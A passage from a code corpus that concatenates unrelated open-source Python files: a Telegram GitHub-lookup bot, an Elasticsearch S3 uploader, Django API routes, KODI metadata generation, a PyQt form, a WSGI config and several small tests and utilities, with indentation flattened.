bot.send_message(m.chat.id, 'Name : <b>{}</b>\nType : <b>{}</b>\nCompany : <b>{}</b>\nblog : <code>{}</code>\nlocation : <b>{}</b>\nbio : <i>{}</i>\n\nUrl : <code>{}</code>\nfollowers : <code>{}</code>\nfollowing : <code>{}</code>\nRepos : <code>{}</code>\n\xE2\x97\xBC \xE2\x97\xBB \xE2\x97\xBC \xE2\x97\xBB \xE2\x97\xBC \xE2\x97\xBB \xE2\x97\xBC'.format(name,typee,company,blog,location,bio,url_html,followers,following,public_repos), parse_mode='HTML')
print 'bot send git command'
if 'message' in json_data:
bot.send_message(m.chat.id, 'Error \n/git [username]')
return
@bot.inline_handler(lambda query: len(query.query.split()) == 1)
def qq(q):
text = q.query
r = requests.get('https://api.github.com/users/{}'.format(text))
json_data = r.json()
if 'avatar_url' in json_data:
url_html = json_data['html_url']
typee = json_data['type']
name = json_data['name']
company = json_data['company']
blog = json_data['blog']
location = json_data['location']
bio = json_data['bio']
public_repos = json_data['public_repos']
followers = json_data['followers']
following = json_data['following']
avatar_url = json_data['avatar_url']
tmp = 'http://ericsteinborn.com/github-for-cats/img/ironcat.png'
gitss = types.InlineQueryResultArticle('1', 'Git username\xE2\x9C\x8F\xEF\xB8\x8F', types.InputTextMessageContent('Name : <b>{}</b>\nUrl : <b>{}</b>\nBlog : <b>{}</b>\nLocation : <b>{}</b>\nBio : <i>{}</i>\n\nRepos : <code>{}</code>\nfollowers : <code>{}</code>\nfollowing : <code>{}</code>'.format(name,url_html,blog,location,bio,public_repos,followers,following), parse_mode="HTML"), thumb_url=tmp)
avatarr = types.InlineQueryResultPhoto('2', '{}'.format(avatar_url), '{}'.format(avatar_url), description='avatar', caption='Name : {}\nUrl : {}\nBlog : {}\nLocation : {}\nBio : {}\n\nRepos : {}'.format(name,url_html,blog,location,bio,public_repos))
bot.answer_inline_query(q.id, [gitss, avatarr], cache_time=1)
bot.polling(True)
|
raishiv/elasticsearch | refs/heads/master | dev-tools/upload-s3.py | 255 | # Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import sys
import argparse
try:
import boto.s3
except:
raise RuntimeError("""
S3 upload requires boto to be installed
Use one of:
'pip install -U boto'
'apt-get install python-boto'
'easy_install boto'
""")
import boto.s3
def list_buckets(conn):
return conn.get_all_buckets()
def upload_s3(conn, path, key, file, bucket):
print 'Uploading %s to Amazon S3 bucket %s/%s' % \
(file, bucket, os.path.join(path, key))
def percent_cb(complete, total):
sys.stdout.write('.')
sys.stdout.flush()
bucket = conn.create_bucket(bucket)
k = bucket.new_key(os.path.join(path, key))
k.set_contents_from_filename(file, cb=percent_cb, num_cb=100)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Uploads files to Amazon S3')
parser.add_argument('--file', '-f', metavar='path to file',
help='the branch to release from', required=True)
parser.add_argument('--bucket', '-b', metavar='B42', default='download.elasticsearch.org',
help='The S3 Bucket to upload to')
parser.add_argument('--path', '-p', metavar='elasticsearch/elasticsearch', default='elasticsearch/elasticsearch',
help='The key path to use')
parser.add_argument('--key', '-k', metavar='key', default=None,
help='The key - uses the file name as default key')
args = parser.parse_args()
if args.key:
key = args.key
else:
key = os.path.basename(args.file)
connection = boto.connect_s3()
upload_s3(connection, args.path, key, args.file, args.bucket);
|
SF-Zhou/LeetCode.Solutions | refs/heads/master | solutions/letter_combinations_of_a_phone_number.py | 1 | class Solution(object):
table = {'1': '',
'2': 'abc',
'3': 'def',
'4': 'ghi',
'5': 'jkl',
'6': 'mno',
'7': 'pqrs',
'8': 'tuv',
'9': 'wxyz',
'0': ' '}
def letterCombinations(self, digits):
"""
:type digits: str
:rtype: List[str]
"""
ret = ['']
for d in digits:
current = []
for r in ret:
for add in self.table[d]:
current.append(r + add)
ret = current
if ret[0] == '':
ret = []
return ret
|
HumanExposure/factotum | refs/heads/master | factotum/urls/api.py | 1 | from django.conf.urls import url
from django.urls import path, include
from apps_api.core import views as coreviews
from apps_api.api import views as apiviews
from apps_api.core.routers import CustomRelationRouter
from apps_api.openapi import views as docsviews
from factotum import settings
router = CustomRelationRouter()
router.register(r"pucs", apiviews.PUCViewSet, basename="puc")
router.register(r"products", apiviews.ProductViewSet)
router.register(r"dataGroups", apiviews.DataGroupViewSet, basename="dataGroup")
router.register(r"dataSources", apiviews.DataSourceViewSet, basename="dataSource")
router.register(r"dataDocuments", apiviews.DocumentViewSet, basename="dataDocument")
router.register(r"chemicals", apiviews.ChemicalViewSet)
router.register(
r"chemicalInstances", apiviews.ChemicalInstanceViewSet, basename="chemicalInstance"
)
router.register(
r"chemicalpresences",
apiviews.ChemicalPresenceViewSet,
basename="chemical_presences",
)
router.register(
r"functionalUses", apiviews.FunctionalUseViewSet, basename="functionalUse"
)
router.register(r"functionalUseCategories", apiviews.FunctionUseCategoryViewSet)
router.register(r"chemicalpresence", apiviews.ChemicalPresenceTagViewSet)
router.register(r"compositions", apiviews.CompositionViewSet, basename="composition")
router.register(
r"classificationMethods",
apiviews.ClassificationMethodViewSet,
basename="classificationMethod",
)
router.register(r"productToPucs", apiviews.ProductToPucViewSet, basename="productToPuc")
urlpatterns = [
path("openapi.json/", docsviews.OpenAPIView.as_view(), name="openapi-schema"),
path("token/", coreviews.ObtainExpiringAuthToken.as_view(), name="token"),
path("", include(router.urls)),
path("", docsviews.RedocView.as_view()),
# Relationships endpoints
path(
"functionalUses/<pk>/relationships/<related_field>",
view=apiviews.FunctionalUseRelationshipView.as_view(),
name="functionalUse-relationships",
),
path(
"dataDocuments/<pk>/relationships/<related_field>",
view=apiviews.DocumentRelationshipView.as_view(),
name="dataDocument-relationships",
),
path(
"dataGroups/<pk>/relationships/<related_field>",
view=apiviews.DataGroupRelationshipView.as_view(),
name="dataGroup-relationships",
),
# Relationships endpoints chemicalInstance
# For clarity the urls are going to be different but the RelationshipView
# functions the same for all children of the raw chemical model
path(
"compositions/<pk>/relationships/<related_field>",
view=apiviews.ChemicalInstanceRelationshipView.as_view(),
name="composition-relationships",
),
path(
"chemicalInstances/<pk>/relationships/<related_field>",
view=apiviews.ChemicalInstanceRelationshipView.as_view(),
name="chemicalInstance-relationships",
),
# Custom viewset actions
path(
"products/bulk",
view=apiviews.ProductViewSet.as_view(actions={"post": "create_bulk"}),
name="product_csv",
),
path(
"products",
view=apiviews.ProductViewSet.as_view(actions={"post": "create"}),
name="product",
),
path(
"products/<pk>/relationships/<related_field>",
view=apiviews.ProductRelationshipView.as_view(),
name="product-relationships",
),
path(
"productToPucs/<pk>/relationships/<related_field>",
view=apiviews.ProductToPucRelationshipView.as_view(),
name="productToPuc-relationships",
),
path("", include("django_prometheus.urls")),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [url(r"^__debug__/", include(debug_toolbar.urls))] + urlpatterns
|
pchretien/ants | refs/heads/master | python/test.py | 1 | ## ants ##
#
# This program simulates an ants colony.
# Copyright (C) 2008,2009 Philippe Chretien
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License Version 2
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# You will find the latest version of this code at the following address:
# http://github.com/pchretien
#
# You can contact me at the following email address:
# [email protected]
from Fourmi import *
from Domaine import *
from Position import *
dt = 1.
dx = 1.
# Dimensions du domaine
lx = 10
ly = 10
# Position de la nouriture ...
hg = Position(2,2)
bd = Position(2,3)
# Nid
position_du_nid = Position( 5,5 )
# Objet de gestion du parametre de source
source = SourceSansEffet(0)
# Domaine dans lequel evoluent la fourmi
domaine = Domaine( lx, ly, dx, dt, source, hg, bd, 0.02, 10. )
domaine.n[4][4] = 1
domaine.n[5][4] = 2
domaine.n[6][4] = 3
domaine.n[4][5] = 4
domaine.n[5][5] = 0
domaine.n[6][5] = 5
domaine.n[4][6] = 6
domaine.n[5][6] = 7
domaine.n[6][6] = 8
# Une fourmi
fourmi = Fourmi( domaine, position_du_nid, 1, 1 )
fourmi.bouge()
fourmi = Fourmi( domaine, position_du_nid, 1, 1 )
fourmi.mode = 1
fourmi.positionNid = Position(5,3)
fourmi.bouge()
p1 = Position(5,4)
p2 = Position(5,3)
print p1.distance(p2)
|
dycodedev/taiga-back | refs/heads/master | taiga/front/sitemaps/base.py | 14 | # Copyright (C) 2015 David Barragán <[email protected]>
# Copyright (C) 2015 Taiga Agile LLC <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib.sitemaps import Sitemap as DjangoSitemap
class Sitemap(DjangoSitemap):
def get_urls(self, page=1, site=None, protocol=None):
urls = []
latest_lastmod = None
all_items_lastmod = True # track if all items have a lastmod
for item in self.paginator.page(page).object_list:
loc = self.__get('location', item)
priority = self.__get('priority', item, None)
lastmod = self.__get('lastmod', item, None)
if all_items_lastmod:
all_items_lastmod = lastmod is not None
if (all_items_lastmod and
(latest_lastmod is None or lastmod > latest_lastmod)):
latest_lastmod = lastmod
url_info = {
'item': item,
'location': loc,
'lastmod': lastmod,
'changefreq': self.__get('changefreq', item, None),
'priority': str(priority if priority is not None else ''),
}
urls.append(url_info)
if all_items_lastmod and latest_lastmod:
self.latest_lastmod = latest_lastmod
return urls
|
synapse-wireless/pyduino-includes | refs/heads/master | pyduinoincludes/__init__.py | 2 | from io import *
|
timovanopstal/nutils | refs/heads/master | tests/ischeme.py | 1 | #!/usr/bin/env python
from nutils import *
from . import register, unittest
def _test( ref, ptype, target_points, target_weights=None ):
points, weights = ref.getischeme( ptype )
assert points.ndim == 2
assert points.shape[1] == ref.ndims
numpy.testing.assert_almost_equal( points, target_points )
if target_weights is None:
assert weights is None
else:
assert weights.ndim == 1
assert weights.shape[0] == points.shape[0]
numpy.testing.assert_almost_equal( weights, target_weights )
@register
def check():
@unittest
def line():
ref = element.getsimplex(1)
a = numpy.sqrt(1/3.)
b = numpy.sqrt(3/5.)
_test( ref, 'gauss1', [[.5]], [1.] )
_test( ref, 'gauss2', [[.5-.5*a],[.5+.5*a]], [.5,.5] )
_test( ref, 'gauss3', [[.5-.5*a],[.5+.5*a]], [.5,.5] )
_test( ref, 'gauss4', [[.5-.5*b],[.5],[.5+.5*b]], [5/18.,4/9.,5/18.] )
_test( ref, 'gauss5', [[.5-.5*b],[.5],[.5+.5*b]], [5/18.,4/9.,5/18.] )
_test( ref, 'uniform1', [[.5]], [1.] )
_test( ref, 'uniform2', [[.25],[.75]], [.5,.5] )
_test( ref, 'uniform3', [[1/6.],[1/2.],[5/6.]], [1/3.]*3 )
def quad():
ref = element.getsimplex(1)**2
a = numpy.sqrt(1/3.)
b = numpy.sqrt(3/5.)
_test( ref, 'gauss1', [[.5,.5]], [1.] )
_test( ref, 'gauss2', [[.5-.5*a,.5-.5*a],[.5-.5*a,.5+.5*a],[.5+.5*a,.5-.5*a],[.5+.5*a,.5+.5*a]], [1/4.]*4 )
_test( ref, 'gauss1,4', [[.5,.5-.5*b],[.5,.5],[.5,.5+.5*b]], [5/18.,4/9.,5/18.] )
_test( ref, 'uniform1', [[.5,.5]], [1.] )
_test( ref, 'uniform2', [[.25,.25],[.25,.75],[.75,.25],[.75,.75]], [1/4.]*4 )
_test( ref, 'uniform1,3', [[.5,1/6.],[.5,1/2.],[.5,5/6.]], [1/3.]*3 )
_test( ref, 'uniform1*gauss1', [[.5,.5]], [1.] )
_test( ref, 'uniform2*gauss1', [[.25,.5],[.75,.5]], [.5,.5] )
_test( ref, 'uniform1*gauss2', [[.5,.5-.5*a],[.5,.5+.5*a]], [.5,.5] )
_test( ref, 'uniform2*gauss2', [[.25,.5-.5*a],[.25,.5+.5*a],[.75,.5-.5*a],[.75,.5+.5*a]], [1/4.]*4 )
def testTriangle():
ref = element.getsimplex(2)
_test( ref, 'gauss1', [[1/3.,1/3.]], [.5] )
_test( ref, 'gauss2', [[2/3.,1/6.],[1/6.,2/3.],[1/6.,1/6.]], [1/6.]*3 )
_test( ref, 'gauss3', [[1/3.,1/3.],[3/5.,1/5.],[1/5.,3/5.],[1/5.,1/5.]], [-9/32.,25/96.,25/96.,25/96.] )
_test( ref, 'uniform1', [[1/3.,1/3.]], [.5] )
_test( ref, 'uniform2', [[1/6.,1/6.],[1/6.,2/3.],[2/3.,1/6.],[1/3.,1/3.]], [1/8.]*4 )
def testHexagon():
ref = element.getsimplex(1)**3
_test( ref, 'uniform1', [[.5,.5,.5]], [1.] )
def testPrism():
ref = element.getsimplex(1)*element.getsimplex(2)
_test( ref, 'uniform1', [[.5,1/3.,1/3.]], [.5] )
_test( ref, 'uniform2', [[.25,1/6.,1/6.],[.25,1/6.,2/3.],[.25,2/3.,1/6.],[.25,1/3.,1/3.],[.75,1/6.,1/6.],[.75,1/6.,2/3.],[.75,2/3.,1/6.],[.75,1/3.,1/3.]], [1/16.]*8 )
_test( ref, 'uniform1*gauss2', [[.5,2/3.,1/6.],[.5,1/6.,2/3.],[.5,1/6.,1/6.]], [1/6.]*3 )
|
slightstone/SickRage | refs/heads/master | sickbeard/metadata/kodi_12plus.py | 3 | # URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import generic
import datetime
import sickbeard
from sickbeard import logger, exceptions, helpers
from sickbeard.exceptions import ex
import xml.etree.cElementTree as etree
class KODI_12PlusMetadata(generic.GenericMetadata):
"""
Metadata generation class for KODI 12+.
The following file structure is used:
show_root/tvshow.nfo (show metadata)
show_root/fanart.jpg (fanart)
show_root/poster.jpg (poster)
show_root/banner.jpg (banner)
show_root/Season ##/filename.ext (*)
show_root/Season ##/filename.nfo (episode metadata)
show_root/Season ##/filename-thumb.jpg (episode thumb)
show_root/season##-poster.jpg (season posters)
show_root/season##-banner.jpg (season banners)
show_root/season-all-poster.jpg (season all poster)
show_root/season-all-banner.jpg (season all banner)
"""
def __init__(self,
show_metadata=False,
episode_metadata=False,
fanart=False,
poster=False,
banner=False,
episode_thumbnails=False,
season_posters=False,
season_banners=False,
season_all_poster=False,
season_all_banner=False):
generic.GenericMetadata.__init__(self,
show_metadata,
episode_metadata,
fanart,
poster,
banner,
episode_thumbnails,
season_posters,
season_banners,
season_all_poster,
season_all_banner)
self.name = 'KODI 12+'
self.poster_name = "poster.jpg"
self.season_all_poster_name = "season-all-poster.jpg"
# web-ui metadata template
self.eg_show_metadata = "tvshow.nfo"
self.eg_episode_metadata = "Season##\\<i>filename</i>.nfo"
self.eg_fanart = "fanart.jpg"
self.eg_poster = "poster.jpg"
self.eg_banner = "banner.jpg"
self.eg_episode_thumbnails = "Season##\\<i>filename</i>-thumb.jpg"
self.eg_season_posters = "season##-poster.jpg"
self.eg_season_banners = "season##-banner.jpg"
self.eg_season_all_poster = "season-all-poster.jpg"
self.eg_season_all_banner = "season-all-banner.jpg"
def _show_data(self, show_obj):
"""
Creates an elementTree XML structure for an KODI-style tvshow.nfo and
returns the resulting data object.
show_obj: a TVShow instance to create the NFO for
"""
show_ID = show_obj.indexerid
indexer_lang = show_obj.lang
lINDEXER_API_PARMS = sickbeard.indexerApi(show_obj.indexer).api_params.copy()
lINDEXER_API_PARMS['actors'] = True
if indexer_lang and not indexer_lang == 'en':
lINDEXER_API_PARMS['language'] = indexer_lang
if show_obj.dvdorder != 0:
lINDEXER_API_PARMS['dvdorder'] = True
t = sickbeard.indexerApi(show_obj.indexer).indexer(**lINDEXER_API_PARMS)
tv_node = etree.Element("tvshow")
try:
myShow = t[int(show_ID)]
except sickbeard.indexer_shownotfound:
logger.log(u"Unable to find show with id " + str(show_ID) + " on " + sickbeard.indexerApi(
show_obj.indexer).name + ", skipping it", logger.ERROR)
raise
except sickbeard.indexer_error:
logger.log(
u"" + sickbeard.indexerApi(show_obj.indexer).name + " is down, can't use its data to add this show",
logger.ERROR)
raise
# check for title and id
if getattr(myShow, 'seriesname', None) is None or getattr(myShow, 'id', None) is None:
logger.log(u"Incomplete info for show with id " + str(show_ID) + " on " + sickbeard.indexerApi(
show_obj.indexer).name + ", skipping it", logger.ERROR)
return False
title = etree.SubElement(tv_node, "title")
if getattr(myShow, 'seriesname', None) is not None:
title.text = myShow["seriesname"]
rating = etree.SubElement(tv_node, "rating")
if getattr(myShow, 'rating', None) is not None:
rating.text = myShow["rating"]
year = etree.SubElement(tv_node, "year")
if getattr(myShow, 'firstaired', None) is not None:
try:
year_text = str(datetime.datetime.strptime(myShow["firstaired"], '%Y-%m-%d').year)
if year_text:
year.text = year_text
except:
pass
plot = etree.SubElement(tv_node, "plot")
if getattr(myShow, 'overview', None) is not None:
plot.text = myShow["overview"]
episodeguide = etree.SubElement(tv_node, "episodeguide")
episodeguideurl = etree.SubElement(episodeguide, "url")
episodeguideurl2 = etree.SubElement(tv_node, "episodeguideurl")
if getattr(myShow, 'id', None) is not None:
showurl = sickbeard.indexerApi(show_obj.indexer).config['base_url'] + str(myShow["id"]) + '/all/en.zip'
episodeguideurl.text = showurl
episodeguideurl2.text = showurl
mpaa = etree.SubElement(tv_node, "mpaa")
if getattr(myShow, 'contentrating', None) is not None:
mpaa.text = myShow["contentrating"]
indexerid = etree.SubElement(tv_node, "id")
if getattr(myShow, 'id', None) is not None:
indexerid.text = str(myShow["id"])
indexer = etree.SubElement(tv_node, "indexer")
if show_obj.indexer is not None:
indexer.text = str(show_obj.indexer)
genre = etree.SubElement(tv_node, "genre")
if getattr(myShow, 'genre', None) is not None:
if isinstance(myShow["genre"], basestring):
genre.text = " / ".join(x.strip() for x in myShow["genre"].split('|') if x.strip())
premiered = etree.SubElement(tv_node, "premiered")
if getattr(myShow, 'firstaired', None) is not None:
premiered.text = myShow["firstaired"]
studio = etree.SubElement(tv_node, "studio")
if getattr(myShow, 'network', None) is not None:
studio.text = myShow["network"]
if getattr(myShow, '_actors', None) is not None:
for actor in myShow['_actors']:
cur_actor = etree.SubElement(tv_node, "actor")
cur_actor_name = etree.SubElement(cur_actor, "name")
if getattr(actor, 'name', None) is not None:
cur_actor_name.text = actor['name'].strip()
cur_actor_role = etree.SubElement(cur_actor, "role")
if getattr(actor, 'role', None) is not None:
cur_actor_role.text = actor['role']
cur_actor_thumb = etree.SubElement(cur_actor, "thumb")
if getattr(actor, 'image', None) is not None:
cur_actor_thumb.text = actor['image']
# Make it purdy
helpers.indentXML(tv_node)
data = etree.ElementTree(tv_node)
return data
def _ep_data(self, ep_obj):
"""
Creates an elementTree XML structure for an KODI-style episode.nfo and
returns the resulting data object.
show_obj: a TVEpisode instance to create the NFO for
"""
eps_to_write = [ep_obj] + ep_obj.relatedEps
indexer_lang = ep_obj.show.lang
lINDEXER_API_PARMS = sickbeard.indexerApi(ep_obj.show.indexer).api_params.copy()
lINDEXER_API_PARMS['actors'] = True
if indexer_lang and not indexer_lang == 'en':
lINDEXER_API_PARMS['language'] = indexer_lang
if ep_obj.show.dvdorder != 0:
lINDEXER_API_PARMS['dvdorder'] = True
try:
t = sickbeard.indexerApi(ep_obj.show.indexer).indexer(**lINDEXER_API_PARMS)
myShow = t[ep_obj.show.indexerid]
except sickbeard.indexer_shownotfound, e:
raise exceptions.ShowNotFoundException(e.message)
except sickbeard.indexer_error, e:
logger.log(u"Unable to connect to " + sickbeard.indexerApi(
ep_obj.show.indexer).name + " while creating meta files - skipping - " + ex(e), logger.ERROR)
return
if len(eps_to_write) > 1:
rootNode = etree.Element("kodimultiepisode")
else:
rootNode = etree.Element("episodedetails")
# write an NFO containing info for all matching episodes
for curEpToWrite in eps_to_write:
try:
myEp = myShow[curEpToWrite.season][curEpToWrite.episode]
except (sickbeard.indexer_episodenotfound, sickbeard.indexer_seasonnotfound):
logger.log(u"Unable to find episode " + str(curEpToWrite.season) + "x" + str(
curEpToWrite.episode) + " on " + sickbeard.indexerApi(
ep_obj.show.indexer).name + ".. has it been removed? Should I delete from db?")
return None
if getattr(myEp, 'firstaired', None) is None:
myEp["firstaired"] = str(datetime.date.fromordinal(1))
if getattr(myEp, 'episodename', None) is None:
logger.log(u"Not generating nfo because the ep has no title", logger.DEBUG)
return None
logger.log(u"Creating metadata for episode " + str(ep_obj.season) + "x" + str(ep_obj.episode), logger.DEBUG)
if len(eps_to_write) > 1:
episode = etree.SubElement(rootNode, "episodedetails")
else:
episode = rootNode
title = etree.SubElement(episode, "title")
if curEpToWrite.name != None:
title.text = curEpToWrite.name
showtitle = etree.SubElement(episode, "showtitle")
if curEpToWrite.show.name != None:
showtitle.text = curEpToWrite.show.name
season = etree.SubElement(episode, "season")
season.text = str(curEpToWrite.season)
episodenum = etree.SubElement(episode, "episode")
episodenum.text = str(curEpToWrite.episode)
uniqueid = etree.SubElement(episode, "uniqueid")
uniqueid.text = str(curEpToWrite.indexerid)
aired = etree.SubElement(episode, "aired")
if curEpToWrite.airdate != datetime.date.fromordinal(1):
aired.text = str(curEpToWrite.airdate)
else:
aired.text = ''
plot = etree.SubElement(episode, "plot")
if curEpToWrite.description != None:
plot.text = curEpToWrite.description
runtime = etree.SubElement(episode, "runtime")
if curEpToWrite.season != 0:
if getattr(myShow, 'runtime', None) is not None:
runtime.text = myShow["runtime"]
displayseason = etree.SubElement(episode, "displayseason")
if getattr(myEp, 'airsbefore_season', None) is not None:
displayseason_text = myEp['airsbefore_season']
if displayseason_text != None:
displayseason.text = displayseason_text
displayepisode = etree.SubElement(episode, "displayepisode")
if getattr(myEp, 'airsbefore_episode', None) is not None:
displayepisode_text = myEp['airsbefore_episode']
if displayepisode_text != None:
displayepisode.text = displayepisode_text
thumb = etree.SubElement(episode, "thumb")
thumb_text = getattr(myEp, 'filename', None)
if thumb_text != None:
thumb.text = thumb_text
watched = etree.SubElement(episode, "watched")
watched.text = 'false'
credits = etree.SubElement(episode, "credits")
credits_text = getattr(myEp, 'writer', None)
if credits_text != None:
credits.text = credits_text
director = etree.SubElement(episode, "director")
director_text = getattr(myEp, 'director', None)
if director_text is not None:
director.text = director_text
rating = etree.SubElement(episode, "rating")
rating_text = getattr(myEp, 'rating', None)
if rating_text != None:
rating.text = rating_text
gueststar_text = getattr(myEp, 'gueststars', None)
if isinstance(gueststar_text, basestring):
for actor in (x.strip() for x in gueststar_text.split('|') if x.strip()):
cur_actor = etree.SubElement(episode, "actor")
cur_actor_name = etree.SubElement(cur_actor, "name")
cur_actor_name.text = actor
if getattr(myEp, '_actors', None) is not None:
for actor in myShow['_actors']:
cur_actor = etree.SubElement(episode, "actor")
cur_actor_name = etree.SubElement(cur_actor, "name")
cur_actor_name_text = actor['name']
if isinstance(cur_actor_name_text, basestring):
cur_actor_name.text = cur_actor_name_text.strip()
cur_actor_role = etree.SubElement(cur_actor, "role")
cur_actor_role_text = actor['role']
if cur_actor_role_text != None:
cur_actor_role.text = cur_actor_role_text
cur_actor_thumb = etree.SubElement(cur_actor, "thumb")
cur_actor_thumb_text = actor['image']
if cur_actor_thumb_text != None:
cur_actor_thumb.text = cur_actor_thumb_text
# Make it purdy
helpers.indentXML(rootNode)
data = etree.ElementTree(rootNode)
return data
# present a standard "interface" from the module
metadata_class = KODI_12PlusMetadata
|
ajavadia/ScaffCC | refs/heads/master | rkqc/tools/gui/ui/PathBenchmarks.py | 3 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'PathBenchmarks.ui'
#
# Created: Thu Jun 9 13:03:04 2011
# by: PyQt4 UI code generator 4.8.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_PathBenchmarks(object):
def setupUi(self, PathBenchmarks):
PathBenchmarks.setObjectName(_fromUtf8("PathBenchmarks"))
PathBenchmarks.resize(400, 300)
PathBenchmarks.setWindowTitle(_fromUtf8(""))
self.horizontalLayout_2 = QtGui.QHBoxLayout(PathBenchmarks)
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
spacerItem = QtGui.QSpacerItem(91, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.widget = QtGui.QWidget(PathBenchmarks)
self.widget.setObjectName(_fromUtf8("widget"))
self.formLayout = QtGui.QFormLayout(self.widget)
self.formLayout.setMargin(0)
self.formLayout.setMargin(0)
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.label = QtGui.QLabel(self.widget)
self.label.setObjectName(_fromUtf8("label"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.label)
self.label_2 = QtGui.QLabel(self.widget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.label_2)
self.filetype = QtGui.QComboBox(self.widget)
self.filetype.setObjectName(_fromUtf8("filetype"))
self.filetype.addItem(_fromUtf8(""))
self.filetype.addItem(_fromUtf8(""))
self.filetype.addItem(_fromUtf8(""))
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.filetype)
self.info = QtGui.QLabel(self.widget)
self.info.setObjectName(_fromUtf8("info"))
self.formLayout.setWidget(2, QtGui.QFormLayout.FieldRole, self.info)
self.path = PathSelector(self.widget)
self.path.setMinimumSize(QtCore.QSize(200, 0))
self.path.setObjectName(_fromUtf8("path"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.path)
self.horizontalLayout_2.addWidget(self.widget)
spacerItem1 = QtGui.QSpacerItem(90, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.retranslateUi(PathBenchmarks)
QtCore.QMetaObject.connectSlotsByName(PathBenchmarks)
def retranslateUi(self, PathBenchmarks):
self.label.setText(QtGui.QApplication.translate("PathBenchmarks", "Location:", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("PathBenchmarks", "Type:", None, QtGui.QApplication.UnicodeUTF8))
self.filetype.setItemText(0, QtGui.QApplication.translate("PathBenchmarks", "Functions", None, QtGui.QApplication.UnicodeUTF8))
self.filetype.setItemText(1, QtGui.QApplication.translate("PathBenchmarks", "Circuits", None, QtGui.QApplication.UnicodeUTF8))
self.filetype.setItemText(2, QtGui.QApplication.translate("PathBenchmarks", "Truth Tables", None, QtGui.QApplication.UnicodeUTF8))
self.info.setText(QtGui.QApplication.translate("PathBenchmarks", "Please choose a location", None, QtGui.QApplication.UnicodeUTF8))
from core.PathSelector import PathSelector
|
Ecotrust/locus | refs/heads/master | deploy/templates/wsgi.py | 1 | import sys
import site
import os
project = '/usr/local/apps/locus/locus'
ve = '/usr/local/apps/locus/env'
vepath = os.path.join(ve,'lib/python2.7/site-packages')
local_path = os.path.join('/usr/local/lib/python2.7/site-packages')
prev_sys_path = list(sys.path)
# add the site-packages of our virtualenv as a site dir
site.addsitedir(vepath)
# add the app's directory to the PYTHONPATH
sys.path.append(project)
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# reorder sys.path so new directories from the addsitedir show up first
new_sys_path = [p for p in sys.path if p not in prev_sys_path]
for item in new_sys_path:
sys.path.remove(item)
sys.path[:0] = new_sys_path
# Import django down here so we make sure to get the correct version
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.core.handlers.wsgi import WSGIHandler
application = WSGIHandler()
|
GunoH/intellij-community | refs/heads/master | python/testData/editing/unindentTab.before.py | 83 | #// python 3
class C:
def m(self): #// note: TABs instead of spaces
pass
|
chartjes/liesitoldmykids | refs/heads/master | simplejson/tests/test_pass3.py | 261 | from unittest import TestCase
import simplejson as json
# from http://json.org/JSON_checker/test/pass3.json
JSON = r'''
{
"JSON Test Pattern pass3": {
"The outermost value": "must be an object or array.",
"In this test": "It is an object."
}
}
'''
class TestPass3(TestCase):
def test_parse(self):
# test in/out equivalence and parsing
res = json.loads(JSON)
out = json.dumps(res)
self.assertEquals(res, json.loads(out))
|
BertRaeymaekers/scrapbook | refs/heads/master | random_projects/pedigree_scripts/pedtodot.py | 1 | #!/usr/bin/python3
from collections import OrderedDict
import os
import sys
def help(rc: int=0):
print("The pedtodot.py script transforms a pedigree file into a dot file that Graphiz can use to create a graph.")
print("")
print("\t-h: This help message.")
print("\t-f --file: The pedigree file to read [default: /home/bert/Documents/DropBox/banded.txt]")
print("\t-o --output: The output file [default: the pedigree file with the .dot extention instead]")
